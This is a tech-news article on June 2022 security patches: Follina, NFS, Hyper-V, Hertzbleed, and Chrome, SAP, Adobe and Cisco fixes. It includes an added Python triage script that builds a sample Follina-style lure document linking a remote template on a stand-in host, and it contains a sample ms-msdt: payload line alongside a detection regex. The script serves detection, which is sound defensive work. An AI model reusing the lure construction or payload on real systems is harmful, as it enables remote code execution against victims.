Microsoft fixes under-attack Windows 0-day Follina • The Register

2022-06-18 18:45:59 By : Ms. Florence Liu

Patch Tuesday Microsoft claims to have finally fixed the Follina zero-day flaw in Windows as part of its June Patch Tuesday batch, which included security updates to address 55 vulnerabilities.

Follina, eventually acknowledged by Redmond in a security advisory last month, is the most significant of the bunch as it has already been exploited in the wild.

Criminals and snoops can abuse the remote code execution (RCE) bug, tracked as CVE-2022-30190, by crafting a file, such as a Word document, so that when opened it calls out to the Microsoft Windows Support Diagnostic Tool (MSDT) via the ms-msdt: URI scheme, which is then exploited to run malicious code, such as spyware and ransomware. Disabling macros in, say, Word won't stop this from happening, because no macro is involved: in the samples seen in the wild, the document pulls an HTML file from a remote server through Word's remote template feature, and script in that HTML navigates to an ms-msdt: URL that hands attacker-controlled parameters to the diagnostic tool.
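The two artefacts that make a Follina lure recognisable, a remote template relationship inside the .docx and an ms-msdt: URI in the fetched HTML, are easy to check for at triage time. The following script is an added example, not code from The Register or Microsoft. It builds a constructed sample document in memory (the URL, package name and HTML are made up for the demo, not taken from a real sample) and scans both the document and the HTML a sandbox would have fetched for it.

```python
"""Triage a .docx for the Follina (CVE-2022-30190) delivery pattern.

Added example, not from the original article. Checks two observable
artefacts: an attachedTemplate relationship with TargetMode="External"
in word/_rels/settings.xml.rels, and an ms-msdt: URI in the HTML that the
template URL serves. Sample inputs below are constructed for the demo.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# An ms-msdt: URI up to the closing quote of the JS/HTML attribute it sits in.
MSDT_URI_RE = re.compile(r"ms-msdt:[^\"']*", re.IGNORECASE)

# Constructed stand-in for the loader page a template URL would serve.
# (Hypothetical payload; the diagnostic package name and parameters are
# illustrative, not a working exploit chain.)
SAMPLE_HTML = """<!doctype html>
<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param IT_BrowseForFile=calc.exe";
</script></body></html>"""


def build_sample_docx(template_url: str | None) -> bytes:
    """Constructed minimal .docx; template_url=None yields a benign file."""
    rels = [f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">']
    settings_body = ""
    if template_url:
        rels.append(f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                    f'Target="{template_url}" TargetMode="External"/>')
        settings_body = '<w:attachedTemplate r:id="rId1"/>'
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml",
                    f'<?xml version="1.0"?><w:document xmlns:w="{W_NS}">'
                    '<w:body/></w:document>')
        zf.writestr("word/settings.xml",
                    f'<?xml version="1.0"?><w:settings xmlns:w="{W_NS}" '
                    f'xmlns:r="{R_NS}">{settings_body}</w:settings>')
        zf.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


def external_template_targets(docx_bytes: bytes) -> list[str]:
    """Return every external attachedTemplate target declared in the docx."""
    targets: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return targets
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == ATTACHED_TEMPLATE
                    and rel.get("TargetMode") == "External"):
                targets.append(rel.get("Target", ""))
    return targets


def msdt_invocations(html: str) -> list[str]:
    """Return ms-msdt: URIs found in fetched template content."""
    return MSDT_URI_RE.findall(html)


def triage(docx_bytes: bytes, fetched_html: str | None = None) -> dict:
    """Combine both checks into a verdict.

    Any ms-msdt: URI in content an Office document pulls in is treated as
    suspicious; a remote template on its own is flagged for review, since
    legitimate corporate templates also use that feature.
    """
    templates = external_template_targets(docx_bytes)
    msdt = msdt_invocations(fetched_html) if fetched_html else []
    if msdt:
        verdict = "suspicious"
    elif templates:
        verdict = "review"
    else:
        verdict = "clean"
    return {"remote_templates": templates, "msdt_uris": msdt, "verdict": verdict}


if __name__ == "__main__":
    lure = build_sample_docx("http://example.invalid/template.html")
    print(triage(lure, SAMPLE_HTML))
    print(triage(build_sample_docx(None)))
```

Fetch the template URL only from an isolated sandbox, never from the analyst's workstation; the HTML is attacker-controlled. Until the June update is applied, Microsoft's published workaround of removing the ms-msdt protocol handler (export HKCR\ms-msdt with reg export, then delete it) breaks the final step of this chain regardless of how the document is delivered.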

Since May, malware operators, including state-sponsored gangs, have used Follina to menace or compromise organizations, including US and European government agencies; to spread the data-stealing Qbot malware; and to delete data and install banking trojans, among other illicit activities.

"The update for this vulnerability is in the June 2022 cumulative Windows Updates," Redmond said in today's Follina security update.

"Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action."

In addition to mitigating Follina, Microsoft plugged three critical RCE flaws and said none of them have been exploited.

The most severe of the three (CVE-2022-30136), which received a 9.8 out of 10 CVSS rating, affects the Windows Network File System (NFS). Microsoft noted exploitation is "more likely" for this bug, and said that can occur if a miscreant, who is already on the network, makes an unauthenticated, specially crafted call to an NFS service to execute remote code.

"With a score of 9.8, if you're sharing files and file systems over a network with NFS, this should be high on the list to patch,"  Immersive Labs' Kev Breen, director of cyber threat research, warned. 

However, if you can't patch right away, Redmond suggested disabling NFSV4.1. "This could adversely affect your ecosystem and should only be used as a temporary mitigation," it cautioned, adding a bolded warning: "You should NOT apply this mitigation unless you have installed the May 2022 Windows security updates." Those May updates fix CVE-2022-26937, another critical vuln in NFS that affects the older protocol versions you would be falling back to.

The next critical RCE, CVE-2022-30163, is in the Windows Hyper-V hypervisor. It received a CVSS score of 8.5, and it would be a fairly complex attack to pull off (a miscreant would have to win an unspecified race condition from an application running inside a guest). But if exploited it could be used to move from a guest virtual machine (VM) to the host, where potentially a lot of damage or snooping can be done.

The third critical RCE is CVE-2022-30139 in Windows Lightweight Directory Access Protocol (LDAP) code, though by default systems should not be exploitable.

And while CVE-2022-30147, a Windows Installer elevation-of-privilege vulnerability with a CVSS score of 7.8, doesn't rank as high, severity-wise, as some of the others, "this kind of vulnerability is almost always seen during a cyber attack," Breen noted. Microsoft also marked this bug as more likely to be exploited.

After gaining initial access, an intruder can escalate privileges to the level of an administrator and then disable security tools. "In the case of ransomware attacks, this leverages access to more sensitive data before encrypting the files," Breen told The Register.

As always, there's a summary of Microsoft's patches published by the ZDI.

Intel joined in the Patch Tuesday fun with three security advisories addressing six medium-severity bugs. 

One of these, CVE-2022-24436, was named Hertzbleed and reported to Intel by university researchers. "In the worst case, these attacks can allow an attacker to extract cryptographic keys from remote servers that were previously believed to be secure," the boffins warned.

Hertzbleed is a type of side-channel attack that takes advantage of dynamic frequency scaling and affects all Intel processors along with several of AMD's desktop, mobile and server chips, according to that company.

The researchers said they have notified other processor vendors, such as Arm, and haven't confirmed if they are affected by Hertzbleed.

Essentially all modern CPUs use frequency scaling, an energy management technique that automatically adjusts the CPU core clock frequency depending on the actual processing taking place. A clever attacker could monitor this scaling to infer information about the data being processed – using the core frequency to leak the content of data being handled by code – and recover, for instance, cryptographic keys being handled by the processor. All by paying close attention to exactly how long some code takes to complete, which is affected by the frequency scaling.

As the academics put it: "Hertzbleed takes advantage of our experiments showing that, under certain circumstances, the dynamic frequency scaling of modern x86 processors depends on the data being processed."

It's a very smart and very fiddly timing attack, and slow – like tens of bits per second leaked – and may be exploitable depending on your circumstances. Like with Meltdown and Spectre, there are easier bugs (see above) for miscreants to target to steal data. But it's interesting research. The uni team stated:

First, Hertzbleed shows that on modern x86 CPUs, power side-channel attacks can be turned into (even remote!) timing attacks — lifting the need for any power measurement interface. The cause is that, under certain circumstances, periodic CPU frequency adjustments depend on the current CPU power consumption, and these adjustments directly translate to execution time differences (as 1 hertz = 1 cycle per second).

Second, Hertzbleed shows that, even when implemented correctly as constant time, cryptographic code can still leak via remote timing analysis. The result is that current industry guidelines for how to write constant-time code (such as Intel's one) are insufficient to guarantee constant-time execution on modern processors.

Intel, for its part, provided software guidance for cryptographic code writers, which the chip giant says will help harden libraries and apps against leaking sensitive information. In another security advisory, it basically described Hertzbleed as a fun topic of discussion for geeks at cocktail parties, and no microcode fixes will be coming.

"While this issue is interesting from a research perspective, we do not believe this attack to be practical outside of a lab environment," wrote Jerry Bryant, Intel's senior director of security communications and incident response. "Also note that cryptographic implementations that are hardened against power side-channel attacks are not vulnerable to this issue."

AMD also suggested developers put in place countermeasures in their code.

Meanwhile, Google issued seven security fixes for Chrome and 41 for Android this month. 

Four of the Android vulnerabilities are critical, and the "most severe," according to the June security bulletin, "could lead to remote code execution with no additional execution privileges needed."

In its Chrome advisory, the cloud giant highlighted four high-severity flaws found by external bug hunters. CISA has also warned that miscreants could exploit the bugs to take control of affected systems and urged folks to update now. 

One of the flaws, tracked as CVE-2022-2007, affects an unknown function of the WebGPU component in Google's Chrome browser and is a memory corruption vulnerability, according to VulDB. 

While Google didn't provide much detail about the bug, the vulnerability database reports that it's easy to exploit without any form of authentication. Luckily, neither technical details nor an exploit are publicly available. 

Google paid David Manouchehri, the security researcher who found the vuln, $10,000 back in May. Meanwhile, an exploit would likely cost between $5,000 and $25,000, although VulDB expects the price tag to increase "in the near future."

SAP released 17 security patches this month. This includes HotNews note 2622660, which covers the latest Chromium release, 101.0.4951.54.

SAP also advised customers to fix a couple of improper access control issues in its products. One, detailed in High Priority note 3158375 affects SAP NetWeaver and ABAP Platform and received a CVSS score of 8.6. 

"A permissive configuration of the route permission table may allow an unauthenticated attacker to bypass the protection to execute administration commands on the systems connected to the SAPRouter, compromising the availability of the systems," Onapsis explained. 

The second, detailed in High Priority note 3147498, affects SAP NetWeaver AS Java and received a CVSS score of 8.2. 

In addition to SAP's June security updates, Onapsis researchers said they detected miscreants exploiting three vulnerabilities that SAP already patched: CVE-2021-38163, CVE-2016-2386, and CVE-2016-2388. 

Earlier this month CISA updated its Catalog of Known Exploited Vulnerabilities to include all three. 

Adobe closed 46 holes in its enterprise products for its June Patch Tuesday, and a whopping 40 of these are critical, according to the software maker. All of these except one affect Adobe products running on both Windows and macOS, and Adobe issued a security hotfix for that one outlier, RoboHelp Server.

This flaw only hits RoboHelp Server installations running on Windows. And while it's rated moderate, if exploited it could allow users to manipulate API requests and elevate their account privileges to that of a server administrator.

All of the other products included in the June patchapalooza have at least one critical vuln, and this includes an out-of-bounds-write vulnerability in Adobe Animate that affects 22.0.5 and earlier versions running on Windows and macOS. Adobe publishes very little detail about any of these vulnerabilities, but admits that this one could lead to remote code execution.

Adobe Bridge requires patches for 12 flaws, 11 of them deemed critical and one important. A criminal could exploit these to execute malicious code or modify files on a system.

Adobe Illustrator comes in at 13 critical, three important and one moderate flaw that could lead to arbitrary code execution and memory leaks. 

And finally Adobe InCopy and Adobe InDesign have a combined 15 critical bugs, which could all lead to arbitrary code execution. 

Closing out the June patch-a-thon, Cisco clocked 10 security updates this month, including a new fix for the critical Spring Framework vulnerability disclosed back in March. 

The networking firm also patched a denial of service vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software. This high-severity flaw could be exploited by an unauthenticated, remote attacker by sending a crafted SSL/TLS message through an affected device, thus crashing the process and triggering a reload of the device, according to Cisco. ®


The Register - Independent news and views for the tech community. Part of Situation Publishing
